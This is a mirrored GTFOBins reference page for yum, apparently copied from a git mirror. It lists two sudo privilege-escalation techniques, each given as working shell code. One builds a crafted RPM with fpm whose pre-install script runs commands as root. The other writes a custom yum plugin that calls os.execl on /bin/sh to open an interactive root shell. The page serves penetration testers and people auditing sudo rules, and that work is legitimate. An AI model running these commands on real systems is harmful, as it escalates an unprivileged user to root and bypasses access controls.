GTFOBins.github.io/yum.md at 04b29456a6b71e239fa8a946294efebf7e79eb51 - GTFOBins.github.io - Mastermindzh's git

public-mirrors/GTFOBins.github.io

mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-10-23 00:57:56 +02:00

Rich Mirch 3702ec4d53 Update sudo yum by loading a custom plugin (#58 )

2019-04-06 21:51:33 +01:00

1.0 KiB

Raw Blame History

functions

sudo

description	code
It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target. ``` TF=$(mktemp -d) echo 'id' > $TF/x.sh fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF ```	sudo yum localinstall -y x-1.0-1.noarch.rpm

description	code
Spawn interactive root shell by loading a custom plugin.	TF=$(mktemp -d) cat >$TF/x<<EOF [main] plugins=1 pluginpath=$TF pluginconfpath=$TF EOF cat >$TF/y.conf<<EOF [main] enabled=1 EOF cat >$TF/y.py<<EOF import os import yum from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE requires_api_version='2.1' def init_hook(conduit): os.execl('/bin/sh','/bin/sh') EOF sudo yum -c $TF/x --enableplugin=y